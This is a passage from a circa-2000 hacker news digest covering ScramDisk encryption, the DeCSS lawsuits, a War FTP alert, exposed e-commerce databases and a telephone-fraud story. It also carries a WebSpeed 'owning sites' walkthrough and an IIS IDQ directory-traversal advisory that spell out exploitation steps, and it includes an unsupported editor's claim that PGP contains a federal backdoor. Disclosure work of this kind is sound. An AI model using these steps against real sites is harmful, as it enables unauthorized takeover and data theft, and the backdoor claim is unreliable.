community's attempt to patrol child pornography to picketers in front of a porn store. It's well-intentioned, but it won't change anything. "My recommendation is that this is not the job for a layman, quite simply," he said. "That's why we pay taxes." @HWA 26.0 SCRAMDISK (Windows) on the fly encryption for your data. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This isn't new, but it is a VERY good package, several of my colleagues and myself use it for sensitive material on our winboxes. The bonus is, its free software and will offer sufficient protection of data for most users. This is especially useful for using personal data on your drives at work and hiding it from the boss, its like having your own (secret) hard disk in your work's machine. The other uses are obvious. A note about PGP, the latest versions have a BACKDOOR that allows federal agencies access to your data. Use an earlier version of PGP (4.2) if you want to make things harder for federal agents to access your data(!) - Ed The walls have ears, the net has taps, the government (not just your own) IS listening and scanning your data, so protect your privacy and use PGP for sensitive emails or data transmissions, also use SSH instead of telnet for accessing your shell accounts if possible as many sites are sniffed by hackers daily. - Ed http://www.securiteam.com/tools/ScramDisk_-_Disk_Encryption_Tool.html 5/1/2000 ScramDisk - Disk Encryption Tool Details Scramdisk is a program that allows the creation and use of virtual encrypted drives. Basically, you create a container file on an existing hard drive that is locked with a specific password. This container can then be mounted by the Scramdisk software, which creates a new drive letter to represent the drive. The virtual drive can then only be accessed with the correct pass phrase. Without the correct pass phrase the files on the virtual drive are totally inaccessible - even physically extracting the data will reveal nothing (since the contents are encrypted). Once the pass phrase has been entered correctly and the drive is mounted, the new virtual drive can be used as a normal drive; files can be saved and retrieved and you can safely install applications onto the encrypted drive. Scramdisk allows virtual disks to be stored in a number of ways: 1. In a container file on a FAT formatted hard disk. 2. On an empty partition. 3. Stored in the low bits of a WAV audio file (this is called steganography). This last option is especially interesting, since this WAV file can be sent by e-mail or carried on a diskette without attracting too much attention (since by casual hearing the WAV file sounds like the original sound file). Details: Scramdisk can create virtual disks with a choice of a number of 'industry standard' encryption algorithms: Triple-DES, IDEA, MISTY1, Blowfish, TEA (either 16 & 32 rounds), and Square. It also includes a proprietary and very fast algorithm 'Summer' which is provided for minimal security applications and for compatibility with older versions of ScramDisk. Why not use PGP? PGP is a great program, but it doesn't allow the on-the-fly encryption of a disk's contents. Instead users have to: 1. Decrypt the existing file 2. Work on the data 3. Re-encrypt the data The problem is, while the file is decrypted it is vulnerable to interception. Scramdisk is complementary to PGP; PGP is excellent for communication security, but is somewhat lacking user friendliness when used for data storage security. Flaws in the system Scramdisk is not totally secure (and nor is any security program!). There are a number of ways an attacker may try infiltrating your system: 1. Look for applications that leak data. A very well known word-processor has an interesting bug that leaks parts of the raw contents of the disk when saving an OLE Compound Document. 2. Look for data that isn't deleted securely. Ok, everyone knows that you can undelete a file easily. Did you know that even a file that has been 'wiped' could potentially be recovered by looking at the surface of the disk? Deleted files should be securely wiped using an appropriate program (PGP v6+ contains a secure file wiping program). 3. Look for data that has leaked in other ways. Temporary files and the swap file spring to mind. These both need to be securely erased too. 4. Using Van Eck monitoring. Basically, electrical emissions from the monitor, hard drive and even keyboard can be detected and recorded from a distance away. This may allow an eavesdropper to see what's on your screen or detect your pass phrase as you type it. 5. Brute Forcing. This can happen in a number of ways: they can try brute-forcing your pass phrase (its important to use a large pass phrase that isn't easily guessed, it helps to use both upper and lower case and numbers as well) or they can try to brute force the algorithm. This is hard work (and will take around 2^127 operations with most of the ciphers included with ScramDisk - DES & Summer are exceptions). 6. Some of the ciphers included may be susceptible to attacks not known about in public. The NSA/GCHQ may have a mechanism faster than brute-force of attacking the algorithms. Scramdisk does not include any weak algorithms in the original distribution (apart from Summer, which is included for backwards compatibility), but who can tell what the Intelligence Agencies can do with Blowfish, IDEA, 3DES et al? 7. Install an amended version of ScramDisk on your computer that secretly stores your pass phrase so that it can be later read by a CIA agent. (Or use a program like SKIn98 to do it!) Far fetched? Possibly, but you should be aware that this kind of attack exists. There is no real way to defend this attack. Check the PGP Signatures of the ScramDisk files against the executables on your computer, but could your copy of PGP have also been amended? 8. Beating you until you spill your pass phrase. Truth drugs also work, apparently. The software can be downloaded free of charge from: http://www.scramdisk.clara.net/ @HWA 27.0 HNN:Jan 17: MPAA files more suits over DeCSS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.hackernews.com/arch.html?011700 MPAA Files More Suits over DeCSS contributed by Project Gamma and Macki In an effort to stop further distribution of the DeCSS program the Motion Picture Association of America has filed lawsuits in federal courts. This follows similar action two weeks ago by the DVD industry association. The MPAA feels that allowing potential illegal copying of DVDs with the DeCSS the program would be a violation US copyright law. Wired http://www.wired.com/news/politics/0,1283,33680,00.html ZD Net http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2422893,00.html?chkpt=p1bn CNN has some interesting quotes from a Warner Home Video spokesperson regarding this hole mess. CNN - Look about halfway down http://www.cnn.com/TRANSCRIPTS/0001/11/st.00.html MPAA has a few interesting things to say as well. MPAA http://www.mpaa.org/dvd/content.htm The folks over at CopyLeft have come up with a T-shirt that has the source code to css_descramble.c printed on it. (Cool, and only $15) CopyLeft http://copyleft.net/cgi-bin/copyleft/t039.pl?1&back ** These are really neat, check em out.. - Ed 2600 has posted the story of what has happened to them since their involvement began including them being named as a defendant in the case. 2600.com http://www.2600.com/news/2000/0115.html OpenDVD.org is attempting to cover all the developments (and doing a damn good job) in this case including the scheduled injunction for January 18, 2000. OpenDVD.org http://opendvd.org/ Articles: Wired; Movie Studios File DVD Hack Suit Reuters 5:20 p.m. 14.Jan.2000 PST The seven largest US movie studios filed their own lawsuits Friday to prevent several Internet sites from distributing a program that could allow copying of DVD movies. The lawsuits, filed in federal courts in New York and Connecticut, followed a broader lawsuit filed last month in state court in California by a DVD equipment manufacturers group. At issue is a program called DeCSS, written by a Norwegian programmer, that allows users to bypass the encryption scheme used on DVDs to prevent unauthorized copying. But many Internet users and programmers say the software had a simpler, less insidious goal. They said the program was needed to allow people to watch DVD movies on computers running the Linux operating system. The studios argued that by allowing potential illegal copying, the program violated US copyright law. They asked the courts to prohibit four people from distributing the program on their Web sites. A spokesman for the Motion Picture Association of America, the studios' lobbying group, said the Web sites involved were dvd-copy.com, krackdown.com and ct2600.com. Dozens of other Web sites have also carried either the program or source code instructions showing how to write the program. "This is a case of theft," said Jack Valenti, president of the association. "The posting of the de-encryption formula is no different from making and then distributing unauthorized keys to a department store." The people who posted the code said they had done nothing wrong, insisting that the program was meant to allow viewing of DVD movies under Linux. "I don't have illegal copies of movies on my site," said Shawn Reimerdes, a computer programmer who maintains the dvd-copy.com Web site. "Just posting these files shouldn't be illegal." Internet advocacy groups have also opposed the lawsuits, arguing that the posting of computer codes on a Web site is a form of speech protected by the First Amendment. "This is definitely an infringement on freedom of speech," said Shari Steele, director of legal services at the Electronic Frontier Foundation, a San Francisco -based cyber-rights advocacy group. "What has been done was totally legal. Posting of the program is legal and there are no pirated movies here." Chris DiBona, who promotes Linux use for VA Linux Systems, said the industry had refused to help create a program to play DVDs under Linux. "The whole reason this happened is because the movie industry itself didn't support Linux," DiBona said. "They thought they could keep this a secret. They failed." The lawsuit relied on the 1998 Millennium Digital Copyright Act, which outlawed the distribution of products designed to crack copyright protection schemes. "If you can't protect that which you own, then you don't own anything," MPAA's Valenti said. In the California case, the court last month turned down the industry's request for a temporary restraining order against a much wider array of defendants, many of whom had only provided a link on their Web page to a page containing the actual program. A hearing is scheduled for next week. Friday's lawsuits were filed by Buena Vista Pictures, a unit of Walt Disney, Metro-Goldwyn-Mayer, Paramount Pictures, a unit of Viacom, Sony's Sony Pictures Entertainment, News Corp.'s Twentieth Century Fox Film, Universal Studios, a unit of Seagram, and Warner Bros., a unit of Time Warner. -=- MPAA; 404 - sorry article vanished. @HWA 28.0 WARftpd Security Alert (Will they EVER fix this software??) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://war.jgaa.com/alert/ SECURITY ALERT - WAR FTP DAEMON ALL VERSIONS Updated February 4th 2000 13:30 Central European Time. January 5th 2000, a seriuos security problem with War FTP Daemon 1.70 was reported by email. Two hours after I read the mail, a security alert was sent to the war-ftpd mailing list, the alt.comp.jgaa newsgroup and the bugtraq mailing list. The alert adviced all server operators to take the server off-line until further notice. Brief overview War FTP Daemon 1.70: The bug allows unrestricted access to any file on the local machine also for users that have not logged on. If an older ODBC driver is installed, the bug also gives users unlimited access to all system commands, with administrator privileges (this is a bug in ODBC that has been fixed in recent versions). The advice is to take all version 1.70 servers off-line until the server is upgraded! A bugfix (War FTP Daemon 1.71) was released January 8th 2000 14:40 CET. This version is not completely tested yet. Please report any serious problems to jgaa@jgaa.com. I Will fix bugs in 1.70 over the next few weeks to make 1.70 a little more comfortable to use while we wait for version 3. War FTP Daemon 1.67b2 and previous versions: The bug may give privileged uses unrestricted access to some files. Users must be logged in, and have at least write or create permissions. Users can not execute commands. A bugfix was released less than 24 hours from I read the mail that reported the problem. Buffer overflow problem in 1.6* February 2nd 2000 there was reported a buffer-overflow problem in 1.6 versions on BUGTRAQ. The problem does not seem to compromise the security, but the server can easily be crashed by remote attackers, after they have logged in. A fix was released February 3rd 2000, about an hour after I read about the problem. Bugfixes are released at ftp://ftp.no.jgaa.com and http://war.jgaa.com/alert/files I'm sorry for any inconveniences caused by these problems. General news War FTP Daemon 1.67. I will make a new full distribution for 1.67. Until this is ready, 1.65 must be installed, and then upgraded. War FTP Daemon 1.72 service release. I will make a service release of the 1.70 series in the near future. Some annoying bugs will be fixed, and a command-line utility to add user accounts interactively, or from scripts, will be released. There will also be a simple DLL wrapper interface for easy integration with other software. War FTP Daemon 3.0. The development of the next major release continues. 3.0 is currently running under Windows NT and Linux. The server is however not yet ready for alpha-testing. When all the basic functionality is implemented, and debugged, ftp://ftp.jgaa.com will open up, using version 3.0. This can be expected soon. Early versions for Windows 9x, Windows NT, Debian Linux and FreeBSD will be available for download. Version 3.0 will be Open Source, under the GNU Public License. http://download.jgaa.com will open when War FTP Daemon 3.0 moves into early alpha. Jarle @HWA 29.0 HNN: Jan 17th: Seven eCommerce Sites Found Vulnerable ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by mack MSNBC found seven ecommerce sites open for business with easily accessible customer databases. By connecting to weakly secured SQL databases MSNBC was able to access the personal information including credit card numbers of 2500 people. All of the sites have been informed of the problem. (And people act surprised when I tell them that I don't buy anything on the web.) MSNBC http://www.msnbc.com/news/357305.asp Stealing cards easy as Web browsing By Bob Sullivan MSNBC Jan. 14 — Just how easy is it to steal credit card numbers on the Internet? On Thursday, MSNBC was able to view nearly 2,500 credit card numbers stored by seven small e-commerce Web sites within a few minutes, using elementary instructions provided by a source. In all cases, a list of customers and all their personal information was connected to the Internet and either was not password-protected or the password was viewable directly from the Web site. CREDIT CARD THEFT, a problem long lurking in the background of Internet commerce, leaped to the top of consumers’ minds earlier this month when a computer intruder calling himself Maxus was able to break into CD Universe’s database of user credit cards. There’s still speculation about how he did it. But perhaps Maxus didn’t have to work so hard. This week, MSNBC was able to view nearly 2,500 credit card numbers and other data essentially by browsing e-commerce Web sites using a commercially available database tool rather than a Web browser. Not only were the sites storing the credit cards in plain text in a database connected to the Web — the databases were using the default user name and in some cases, no password. These basic security flaws were found by a legitimate Russian software company named Strategy LLC, according to CEO Anatoliy Prokhorov, and shared with MSNBC. He says he tried contacting some of the companies first and got no response. “From our point of view this is just unprofessionalism in a very high degree that’s not explainable,” Prokhorov said. His company writes software that helps consumers compare prices across multiple e-commerce sites, so his developers become familiar with data structures at hundreds of e-commerce sites. He says they weren’t looking to find security flaws, but rather stumbled on these. “This is just a hole we passed by, an open door. Our people were amazed.” But security experts were not. Given the speed required to succeed in the fast-paced Internet economy, companies are in a big hurry to publish working Web sites and often skimp on security measures. “This is a microcosm of what’s out there,” said Elias Levy of SecurityFocus.com. Levy’s site was the first to report the CD Universe break-in last weekend. “One could only imagine what they would have found if they were looking for problems.... The problem is fairly widespread, and what Anatoliy has found is a small snapshot.” Prokhorov also contacted SecurityFocus.com with his information, and the site today will issue its own report based on its independent investigation. The security flaws Prokhorov found involve more than just easy-to-steal credit cards. At all seven sites, MSNBC was able to view a wide selection of personal data including billing addresses, phone numbers and in some cases, employee Social Security numbers. Prokhorov sent the list and instructions to MSNBC on Tuesday. It included about 20 Web sites which either had no password protection at all on their database servers — in each case, they were running Microsoft’s SQL Server software — or had password information exposed on their Web site. Connecting to all the sites was as simple as starting SQL Server and opening a connection to the Web site. (Note: Microsoft is a partner in MSNBC.) Expressmicro.com, Computerparts.com, Directmicro.com and Sharelogic.net — were all contacted 24 hours before this story so they could close the security hole. While the flaws are obvious, assessing blame is a much more sticky business. There’s a mounting concern that small businesses are particularly vulnerable to attack; many don’t have computer experts on staff. Other times, non-technically savvy business owners take lowball bids from developers who promise a secure Web site but don’t deliver. Then there are inherent problems in software itself that make flaws more likely. In some cases, the server-side code underlying a Web page is viewable if a browser places “::$DATA” at the end of the page’s Web address. That code, normally hidden, can contain any usernames, passwords and other information about any computer connected to that server. This flaw was revealed over two years ago and has since been patched. Four of the vulnerable sites MSNBC found were hosted on the same Web server and had not plugged this hole. But even without knowing that technique, an intruder could have entered the sites anyway — the username required for entering the database was the default “sa,” which stands for “system administrator”; the password was the name of the company. “We used a developer, and obviously the developer didn’t take that flaw into consideration,” said a spokesperson for the sites. “The flaw could have lied within the software, but maybe the developer should have taken that into consideration ... and one thing we didn’t do, we didn’t hire a security company to come in and test our Web site.” Getting a second opinion when building an e-commerce site is a good idea, said security expert Russ Cooper, who maintains the popular NTBugTraq mailing list. “Make a condition of the contract that it has to pass scrutiny of another individual who tests the site,” Cooper recommended. The fundamental problem, he said, is that developers have no liability for flaws they leave behind in e-commerce sites. Merchants are responsible for the cost of any stolen merchandise, while most developer contracts make clear they are not responsible for what happens with a site they build. “So a lot of people end up with a working site but not a secure site.” The other three vulnerable sites MSNBC visited simply used “sa” as the username for their database, and no password. Average consumers have no way of knowing how well-guarded their personal information is when they submit it to a Web site. Levy said the problems MSNBC found at these seven sites are hardly isolated. “The blame falls on more than one person. You can’t rush out to set up an e-commerce site regardless of how much you want to make money. ... Many people don’t give (security) a second thought,” he said. One of the fundamental flaws in all these sites — and, experts say, in many other sites — is the storing of private consumer information in the first place. While encryption techniques that scramble the data are available, it’s often kept on a computer in plain text — one step away from the Internet. While that’s more convenient, experts agree it’s a bad idea. “My advice is, if nothing else, don’t store the data where it physically has access to the Web,” said Wesley Wilhelm, a fraud prevention consultant at the Internet Fraud Prevention Advisory Council. “Take them off every night and make a sneakernet run.” As for consumers, there isn’t much they can do to ascertain how well a Web site is guarding their personal information. Some experts suggest using only one card online, and religiously checking credit card bills. While consumers are liable for at most $50 of fraudulent purchases, they are responsible for catching them and alerting their bank. MSNBC’s Curtis Von Veh contributed to this story. @HWA 30.0 HNN:Jan 17: Scotland Yard Investigating Cyber Ransom Demands ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by tom It is alleged the a team of sophisticated professional electronic intruders have broken into twelve multinational companies and have issued ransom demands to prevent the release of stolen information. This report only names one of the company's in question, Visa, and says that Scotland Yard is investigating. (While it would appear that Visa has admitted to the intrusion we would like know who the other companies are.) The UK Times http://www.the-times.co.uk/news/pages/sti/2000/01/16/stinwenws01028.html?999 January 16 2000 BRITAIN Hacker gang blackmails firms with stolen files Jon Ungoed-Thomas and Stan Arnaud A BRITISH group of hackers has broken into the computer systems of at least 12 multinational companies and stolen confidential files. It has issued ransom demands of up to £10m and is also suspected of hiring out its services. Scotland Yard is now investigating the attacks, which computer experts have described as the most serious systematic breach ever of companies' security in Britain. "The group is using very sophisticated techniques and has been exchanging information via e-mail and internet chat," said an investigator. Visa confirmed last week that it had received a ransom demand last month, believed to have been for £10m. "We were hacked into in mid-July last year," said Russ Yarrow, a company spokesman. "They gained access to some corporate material and we informed both Scotland Yard and the FBI." It is understood the hackers stole computer "source codes" that are critical to programming, and threatened to crash the entire system. If Visa's system crashed for just one day, the company - which handles nearly £1 trillion business a year from customers holding 800m Visa cards - could lose tens of millions of pounds. "We received a phone call and an e-mail to an office in England demanding money," Yarrow said. The company contacted police after the ransom demand. "We hardened the system, we sealed it and they did not return. We have firewalls upon firewalls, but are concerned that anyone got in." Scotland Yard's computer crime unit is now scrutinising e-mail traffic between several known hackers in England and Scotland. Last month officers from the unit flew to Hopeman, a Scottish fishing village, and seized equipment from the home of James Grant, who works for a local computer company. He has been interviewed by detectives and Visa security experts. It is understood that he has given a legal undertaking to Visa not to discuss the matter. "He is saying nothing at all," said his mother, Rhona. "That is a situation that will not change in the future." Grant, 20, studied computing in nearby Elgin, and now works for Data Converters, based in Elgin. His father is a member of the civilian security staff at RAF Lossiemouth air base and his mother a care worker. Detectives are studying attacks on at least 12 companies that they believe have been penetrated by the group and others that may be connected, including one within the Virgin group, in which a hacker tried to break into the UK mailing system. They believe the group may also be acting as paid specialists for information brokers who trade corporate secrets. "These are professionals and there is some evidence that suggests some of the activity was contracted and paid for," said a computer expert involved in the investigation. The group's success has exposed flaws in security. The internet company CD Universe last week confirmed it had called in the FBI after being blackmailed by a hacker who had copied more than 300,000 of its customer credit card files. Scotland Yard said: "There is an ongoing investigation into the incident involving Visa, but it is too early to speculate about the involvement of a group." @HWA 31.0 HNN:Jan 17: Pay Phone Fraud Committed with Drinking Straw ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SUCK THIS! From HNN http://www.hackernews.com/ contributed by deeeek Telstra (Australian Telephone Company) has to upgrade 29,000 payphones due to fraud involving a drinking straw. The problem affects 80% of the pay phones installed since 1997. No information about exactly how the fraud was committed was given. (A Straw? Oh, there must be a text file on this somewhere.) Fairfax IT http://it.fairfax.com.au/breaking/20000114/A24452-2000Jan14.html Scam forces Telstra to fix 29,000 pay phones 9:17 Friday 14 January 2000 AAP TELSTRA is urgently modifying 80 per cent of its public pay phones after a scam was discovered involving a drinking straw and free phone calls around the world. Telstra would have the 29,000 vulnerable phones rectified soon, Telstra's public affairs manager Michael Herskope said yesterday. The Spanish-manufactured coin and phone card-operated Smart pay phone was phased into the Australian network from 1997. The scam potentially cost Telstra millions of dollars in unlimited STD and ISD calls since then, but Telstra can only speculate. "We have a rough idea, but that's not something we're really going to publicise,'' Herskope said. The scam was made public on the front page of Albury-Wodonga's The Border Morning Mail yesterday. The newspaper was told by perpetrators that the low-tech scam had been well known since the phones were introduced as part of a $100 million upgrade of the public phone national network. One source said some people may have learnt about it from the Internet. The paper accompanied a man to three public phones chosen at random and observed him make free calls, including one to New York. Telstra had initially dismissed the scam as a myth, the paper said. But Herskope denied that Teltra only learnt of the fraud from the country newspaper. "We've known about it for a little while,'' he said. "It's pretty hard to articulate weeks, days. I'm not sure how it was brought to our attention but it certainly was.'' He said rectifying the problem was a simple procedure. Without disclosing how the fraud was perpetrated, he said there was no design fault in the phone. "This particular fault will be closed off very shortly,'' he said. @HWA 32.0 Owning sites that run WebSpeed web db software ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: win2k security advice mailing list. From: George To: Sent: Friday, February 04, 2000 7:32 PM Subject: Webspeed security issue leaves sites vulnerable I reported this to Progress (maker of Webspeed) a month ago and they said they would fix it but since then I've not seen any fixes released. I also pondered whether or not to release this information because some rather large web databases use Webspeed but I do believe in full disclosure as the best security so here goes... Webspeed is a website creation language used by some of the larger db based websites on the net. Version 3 comes with a java GUI configuration program. This configuration program has certain security setting options in it. One of which doesn't actually do anything. There is one option to turn off access to a utility called WSMadmin. It's in the messenger section of the GUI config program. However checking or unchecking this option doesn't change anything. In fact to turn this feature off you have to hand edit the ubroker.properties file. Look for the following entries: AllowMsngrCmds=1 and each time you find this set it =0 in each of the sections. This will disable the feature (you want to do this on the production server). AllowMsngrCmds=0 Ok, now the exploit to show how serious an issue this is on the web. It's just a misconfiguration really but it's caused by a bug in the java config program (I tested the NT version but since the config program is java it may also affect other platforms) Exploit: go to search engines and search for "wsisa.dll", I used google 3rd page or further (first 3 pages are all junk) Go to URL similar to http://www.domain.com/scripts/wsisa.dll/extra/somepage.htm with your browser change the url in the browser to http://www.domain.com/scripts/wsisa.dll/WService=anything?WSMadmin (note capitals are important) click on the link "End Sessions Logging and Display Sessions Info" (note you may have to start logging first then stop it if they've never used the logging feature) When you pick the End Sessions Logging choice it displays the log, find a statement in the log for the default service "Default Service = nameofservice" back up one page (hit your back button) type nameofservice into the Verify WebSpeed Configuration box and click the verify button. If everything worked you now own their site. I won't explain how to use the utility but anyone familiar with this should know exactly how dangerous this is. Geo. _____________________________________________________________________ ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice" ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST" SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net @HWA 33.0 Cerberus Information Security Advisory (CISADV000202) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Cerberus Information Security Advisory (CISADV000202) http://www.cerberus-infosec.co.uk/advisories.html Released : 2nd February 2000 Name : IDQ Affected Systems : Microsoft Windows NT 4 running Internet Information Server 3 or 4 Issue : Attackers can access files outside of the web virtual directory system Author : David Litchfield (mnemonix@globalnet.co.uk) Description ********* Any web site running Internet Information Server 3 or 4 and using Internet Data Query files to provide search functionality on the site may be exposed. IIS also comes with some sample IDQ scripts that are vulnerable so any website with these sample files left on are at risk. Using these IDQ scripts or even custom scripts it is possible to break outside of the web virtual root and gain unathorized access to files, such as log files and in certain cases the backup version of the Security Accounts Manager (sam._) It does require for the attacker to know the path to the file, for the file to be on the same logical disk drive as the IDQ file and for ACL to allow read access to the anonymous Internet account or the Everyone/guests group. Details ***** The extent of this security hole depends upon whether the recent "webhits" patch has been installed. See http://www.microsoft.com/technet/security/bulletin/ms00-006.asp If the patch has been installed there is still a vulnerability - however, those that have not installed this patch are most at risk. Microsoft are re-releasing this advisory and the updated patch. Please note that Windows 2000 does not seem to be vulnerable to this. Cerberus' vulnerability scanner, CIS, has now been updated to check for this issue. For those that already have a copy of the scanner you can download the updated module from http://www.cerberus-infosec.co.uk/webscan.dll - however those that do not yet have the scanner, if you would like a copy please go to http://www.cerberus-infosec.co.uk/ and follow the Cerberus Internet Scanner link on the frontpage. If the "webhits" patch HAS NOT been installed ************************************ Any idq file that resolves remote user input for any part of the template file is dangerous. eg: CiTemplate = %TemplateName% The ISAPI application that deals with IDQ queries is idq.dll and it will follow double dots in paths to template files, meaning an attacker can break out of the web root. If the idq file appends .htx to the CiTemplate eg: CiTemplate=/iissamples/issamples/%TemplateName%.htx some may think this will limit attackers to viewing only .htx files. Not so. Quoting from the Index Server documentation (/iishelp/ix/htm/ixidqhlp.htm), "Index Server does not support physical paths longer than the Windows NT shell limit (260 characters)." Due to this limit it is possible to append lots of spaces onto the name of the file we want to read and thereby pushing the .htx out of the buffer and we're served back the file. IDQ files known to be at risk in one way or another: prxdocs/misc/prxrch.idq iissamples/issamples/query.idq iissamples/exair/Search/search.idq iissamples/exair/Search/query.idq iissamples/issamples/fastq.idq There are may be more. If the "webhits" patch HAS been installed ******************************* Machines that have had the patch installed will only be vulnerable if the IDQ file does not specify a .htx extention eg: CiTemplate = %TemplateName% and CiTemplate = /somedir/otherdir/%TemplateName% are vulnerable whereas CiTemplate = /somedir/otherdir/%TemplateName%.htx is not vulnerable. Solution: ******* Review your IDQ files to determine if you are at risk. If so edit them and use hardcoded template files. eg CiTemplate=%TemplateName% to CiTemplate=/your-virtual-directory/your-htx-file.htx and then edit your search form to reflect this change. Remove any sample files from the system - not just idq files. Apply the updated patch. About Cerberus Information Security, Ltd ******************************** Cerberus Information Security, Ltd, a UK company, are specialists in penetration testing and other security auditing services. They are the developers of CIS (Cerberus' Internet security scanner) available for free from their website: http://www.cerberus-infosec.co.uk To ensure that the Cerberus Security Team remains one of the strongest security audit teams available globally they continually research operating system and popular service software vulnerabilites leading to the discovery of "world first" issues. This not only keeps the team sharp but also helps the industry and vendors as a whole ultimately protecting the end consumer. As testimony to their ability and expertise one just has to look at exactly how many major vulnerabilities have been discovered by the Cerberus Security Team - over 40 to date, making them a clear leader of companies offering such security services. Founded in late 1999, by Mark and David Litchfield, Cerberus Information Security, Ltd are located in London, UK but serves customers across the World. For more information about Cerberus Information Security, Ltd please visit their website or call on +44(0) 181 661 7405 Permission is hereby granted to copy or redistribute this advisory but only in its entirety. Copyright (C) 2000 by Cerberus Information Security, Ltd ------------------------------------------------------------------------ Delivery co-sponsored by Trend Micro, Inc.: http://www.antivirus.com. ScanMail for Microsoft Exchange * Stops viruses from spreading through Exchange Servers. * Eliminates viruses from email in real time, even unknown macro viruses * Filters spam (unsolicited junk email). * Sends customized virus warning messages to specific parties and admins * Remote installation and management via web or ScanMail's Windows GUI ------------------------------------------------------------------------ _____________________________________________________________________ ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice" ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST" SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net @HWA 34.0 Security Focus Newsletter #26 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Security Focus Newsletter #26 Table of Contents: I. INTRODUCTION II. BUGTRAQ SUMMARY 1. Multiple Vendor BSD /proc File Sytem Vulnerability 2. DNS TLD & Out of Zone NS Domain Hijacking 3. Inter7 vpopmail (vchkpw) Buffer Overflow Vulnerability 4. VMware Symlink Vulnerability 5. HP Path MTU Discovery DoS Vulnerability 6. Microsoft East Asian Word Conversion Vulnerability 7. NT RDISK Registry Enumeration File Vulnerability 8. Qualcomm qpopper 'LIST' Buffer Overflow Vulnerability 9. NT Index Server Directory Traversal Vulnerability III. PATCH UPDATES 1. Vulnerability Patched: Qualcomm qpopper 'LIST' Buffer Overflow 2. Vulnerability Patched: NT Index Server Directory Traversal 3. Vulnerability Patched: Multiple Vendor BSD /proc File Sytem 4. Vulnerability Patched: Multiple Vendor BSD /proc File Sytem 5. Vulnerability Patched: Inter7 vpopmail (vchkpw) Buffer Overflow 6. Vulnerability Patched: NT RDISK Registry Enumeration File 7. Vulnerability Patched: Microsoft East Asian Word Conversion 8. Vulnerability Patched: Multiple Vendor BSD make /tmp Race IV. SECURITYFOCUS.COM TOP 6 NEWS ARTICLES 1. Outpost Leaves Data Unguarded (Mon Jan 24 2000) 2. Japan Says to Seek U.S. Help to Deal With Hackers (Tue Jan 25 2000) 3. Task Force Battles Online Criminals (Wed Jan 26 2000) 4. Smart card 'inventor' lands in jail (Thu Jan 27 2000) 5. Visa acknowledges cracker break-ins (Fri Jan 28 2000) 6. A Year Of Mass-Mailing Viruses (Fri Jan 28 2000) V. INCIDENTS SUMMARY 1. Got scanned again (Thread) 2. Unusual scan pattern (Thread) 3. Possible Probe = Possible Malfunction (Thread) 4. No Idea (Thread) 5. PC Anywhere client seems to probe class C of connected networks (Thread) 6. unapproved AXFR (Thread) 7. Connect thru PIX & ports 1727, 2209, 9200 (Thread) 8. Anti-Death Penalty (Thread) 9. Strange DNS/TCP activity (Thread) 10. eri? (Thread) 11. source port 321 (Thread) 12. Korea (again) (Thread) 13. BOGUS.IvCD File (Thread) 14. port 768 (Thread) 15. Extrange named messages (Thread) 16. Probes to tcp 2766 ('System V Listner') (Thread) 17. Possible attempt at hacking? (Thread) 18. DNS update queries: another sort of suspicious activity. (Thread) VI. VULN-DEV RESEARCH LIST SUMMARY 1. Shadow (Thread) 2. things to break.. (Thread) 3. HTTP scanners? (summary, long) (Thread) 4. CGI insecurities (Thread) 5. ICQ Pass Cracker. (Thread) 6. File Share Vacuum (Thread) 7. IIS4.0 .htw vulnerability (Thread) 8. Napster a little insecure? (Thread) 9. distributed.net and seti@home (Thread) VII. SECURITY JOBS Seeking Employment: 1. Prashant Vijay (Summer Internship) Seeking Staff: 1. Security Research Engineer (Atlanta, Ga) 2. Practice Manager w/PKI experience NYC, Philly or DC) 3. Lead Security Engineer - Bay Area/San Jose 4. Senior security engineers - Bay Area/San Jose 5. Virus coder wanted (San Antonio, TX) 6. Junior Security Engineers Needed (Maryland) VIII. SECURITY SURVEY RESULTS IX. SECURITY FOCUS TOP 6 TOOLS 1. ShadowScan 1.00.093 (Windows 95/98 and Windows NT) 2. SecurityFocus.com Pager (Win95/98/NT) 3. lidentd 1.0p1 (Linux) 4. Cgi Sonar 1.0 (any system supporting perl) 5. Logcheck 1.1.1 (BSDI, Digital UNIX/Alpha, FreeBSD, HP-UX, Linux, NetBSD, OpenBSD, Solaris and SunOS) 6. Secret Sharer 1.0 1.0 (Windows 95/98) X. SPONSOR INFORMATION - CORE SDI http://www.core-sdi.com XI. SUBSCRIBE/UNSUBSCRIBE INFORMATION I. INTRODUCTION ----------------- Welcome to the SecurityFocus.com 'week in review' newsletter issue 26 for the time period of 2000-01-24 to 2000-01-30 sponsored by CORE SDI. CORE SDI is an international computer security research and development company. It's clients include 3 of the Big 5 chartered accountant firms for whom CORE SDI develops customized security auditing tools as well as several notable computer security product vendors, such as Network Associates. In addition to providing 'consultant to the consultant' services CORE also performs risk assesment and security infrastructure consulting for a large number of government and fortune 500 companies in both North and Latin America. http://www.core-sdi.com II. BUGTRAQ SUMMARY 2000-01-24 to 2000-01-30 --------------------------------------------- 1. Multiple Vendor BSD /proc File Sytem Vulnerability BugTraq ID: 940 Remote: No Date Published: 2000-01-21 Relevant URL: http://www.securityfocus.com/bid/940 Summary: Certain BSD derivative operating systems use an implantation of the /proc filesystem which is vulnerable to attack from malicious local users. This attack will gain the user root access to the host. The proc file system was originally designed to allow easy access to information about 